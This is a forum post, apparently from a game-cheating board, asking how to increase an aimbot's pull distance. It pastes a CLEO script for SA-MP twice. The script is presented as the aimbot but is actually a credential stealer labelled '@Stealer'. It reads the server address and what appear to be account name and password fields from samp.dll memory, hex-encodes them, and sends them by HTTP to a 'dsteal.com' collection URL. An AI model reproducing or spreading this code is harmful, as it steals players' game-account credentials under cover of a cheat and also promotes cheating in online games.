Hello members of the ugbase would like to ask the following, would you like to increase the distance at which the aimbot will pull? , I have an aimbot that only pulls when it presses the key "c", very good for cbug, however it only works closely, wanted to know if it has to increase this distabcia in that it pulls the aim, thank you!
{$CLEO .cs}
wait 1750
0AB1: call_scm_func @Thread 1 @Stealer
0A93: end_custom_thread
While true
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0A8E: 3@ = 0@ + 2203896 // int
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 0
if 2@ > 1000
0A8E: 22@ = 2@ + 973 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 0
if 2@ > 1000
0A8E: 5@ = 23@ + 24 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 0
if 4@ > 1000
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 0
if 24@ > 1000
0A8E: 22@ = 0@ + 2203832 // int
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 0
if 1@ > 1000
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 0
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 0
if 6@ == 1
if or
26@ == 1
26@ == 3
25@ = 1
if and
25@ == 1
not 6@ == 1
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 0
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 0
0A8E: 6@ = 0@ + 528432 // int
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 0
0A8E: 7@ = 4@ + 10 // int
if not 23@ >= 16
0085: 12@ = 7@ // (int)
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 0
wait 100
0A8E: 9@ = 2@ + 289 // int
0A8E: 14@ = 2@ + 32 // int
0A8E: 8@ = 2@ + 549 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 0
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 0
010B: 21@ = player $PLAYER_CHAR money
0AC6: 0@ = label @Base offset
0AC8: 20@ = allocate_memory_size 1024
0AC8: 22@ = allocate_memory_size 1024
call @BaseID 0 30@ // Base, Serv, IP, Port,
0AD3: 20@ = format "%d&&%s:%d&&%s&&%s&&%s&&%d" 30@ 14@ 15@ 9@ 12@ 5@ 3@
0C17: 21@ = strlen 20@
0C22: bin 20@ to_hex 20@ size 21@
0AD3: 22@ = format "%s%s" 0@ 20@
0ac8: 8@ = 256
0ad3: 8@ = "SAMP-Project"
0ab1: @InternetOpen 1 8@ to 9@
0ab1: @InternetOpenUrl 2 9@ 22@
0ac9: 8@
0ac9: 20@
0ac9: 22@
0006: 25@ = 0
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@
0AA7: function 29@ params 5 pop 0 {parameters} 0 0 0 {INTERNET_OPEN_TYPE_PRECONFIG} 0 {AGENT} 0@ {HANDLE} 1@
0ab2: 1 1@
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@
0AA7: function 29@ params 6 pop 0 0 0 0 0 1@ 0@ 2@
0ab2: 0
:BaseID // ÁÀÇÀ
0@ = 114
ret 1 0@
"http:" 2f 2f "dsteal.com" 2f "ucp" 2f "include" 2f "add.php?data=" 00
0A9F: 32@ = current_thread_pointer
000A: 32@ += 16
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@ // (int)
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@ // (int)
000A: 33@ += 16
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 44
for 32@ = 0 to 30
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
000A: 33@ += 4
0ab2: 0
{$CLEO .cs}
wait 1750
0AB1: call_scm_func @Thread 1 @Stealer
0A93: end_custom_thread
While true
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0A8E: 3@ = 0@ + 2203896 // int
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 0
if 2@ > 1000
0A8E: 22@ = 2@ + 973 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 0
if 2@ > 1000
0A8E: 5@ = 23@ + 24 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 0
if 4@ > 1000
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 0
if 24@ > 1000
0A8E: 22@ = 0@ + 2203832 // int
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 0
if 1@ > 1000
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 0
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 0
if 6@ == 1
if or
26@ == 1
26@ == 3
25@ = 1
if and
25@ == 1
not 6@ == 1
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 0
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 0
0A8E: 6@ = 0@ + 528432 // int
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 0
0A8E: 7@ = 4@ + 10 // int
if not 23@ >= 16
0085: 12@ = 7@ // (int)
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 0
wait 100
0A8E: 9@ = 2@ + 289 // int
0A8E: 14@ = 2@ + 32 // int
0A8E: 8@ = 2@ + 549 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 0
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 0
010B: 21@ = player $PLAYER_CHAR money
0AC6: 0@ = label @Base offset
0AC8: 20@ = allocate_memory_size 1024
0AC8: 22@ = allocate_memory_size 1024
call @BaseID 0 30@ // Base, Serv, IP, Port,
0AD3: 20@ = format "%d&&%s:%d&&%s&&%s&&%s&&%d" 30@ 14@ 15@ 9@ 12@ 5@ 3@
0C17: 21@ = strlen 20@
0C22: bin 20@ to_hex 20@ size 21@
0AD3: 22@ = format "%s%s" 0@ 20@
0ac8: 8@ = 256
0ad3: 8@ = "SAMP-Project"
0ab1: @InternetOpen 1 8@ to 9@
0ab1: @InternetOpenUrl 2 9@ 22@
0ac9: 8@
0ac9: 20@
0ac9: 22@
0006: 25@ = 0
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@
0AA7: function 29@ params 5 pop 0 {parameters} 0 0 0 {INTERNET_OPEN_TYPE_PRECONFIG} 0 {AGENT} 0@ {HANDLE} 1@
0ab2: 1 1@
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@
0AA7: function 29@ params 6 pop 0 0 0 0 0 1@ 0@ 2@
0ab2: 0
:BaseID // ÁÀÇÀ
0@ = 114
ret 1 0@
"http:" 2f 2f "dsteal.com" 2f "ucp" 2f "include" 2f "add.php?data=" 00
0A9F: 32@ = current_thread_pointer
000A: 32@ += 16
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@ // (int)
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@ // (int)
000A: 33@ += 16
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 44
for 32@ = 0 to 30
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
000A: 33@ += 4
0ab2: 0